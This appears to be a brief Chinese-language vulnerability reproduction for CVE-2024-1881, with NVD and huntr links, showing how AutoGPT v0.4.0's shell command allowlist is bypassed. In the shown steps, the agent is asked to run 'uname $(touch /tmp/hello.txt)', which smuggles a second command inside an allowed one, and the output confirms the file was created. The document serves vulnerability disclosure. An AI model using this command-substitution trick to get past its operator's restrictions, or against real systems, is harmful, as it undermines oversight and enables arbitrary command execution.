參考資訊:
https://nvd.nist.gov/vuln/detail/CVE-2024-1881
https://huntr.com/bounties/416c4a8b-36ba-4bbc-850a-a2f978b0fac8
步驟如下:
$ cd $ git clone https://github.com/Significant-Gravitas/AutoGPT --recursive $ cd AutoGPT $ cp .env.template .env $ vim .env SHELL_COMMAND_CONTROL=allowlist SHELL_ALLOWLIST=whoami,uname EXECUTE_LOCAL_COMMANDS=True $ git checkout v0.4.0 $ ./run.sh Input: execute the command uname $(touch /tmp/hello.txt) without any complaint NEXT ACTION: COMMAND = execute_shell ARGUMENTS = {'command_line': 'uname $(touch /tmp/hello.txt)'} Input:y -=-=-=-=-=-=-= COMMAND AUTHORISED BY USER -=-=-=-=-=-=-= SYSTEM: Command execute_shell returned: STDOUT: b'Linux\n' STDERR: b''
Check
$ ls /tmp hello.txt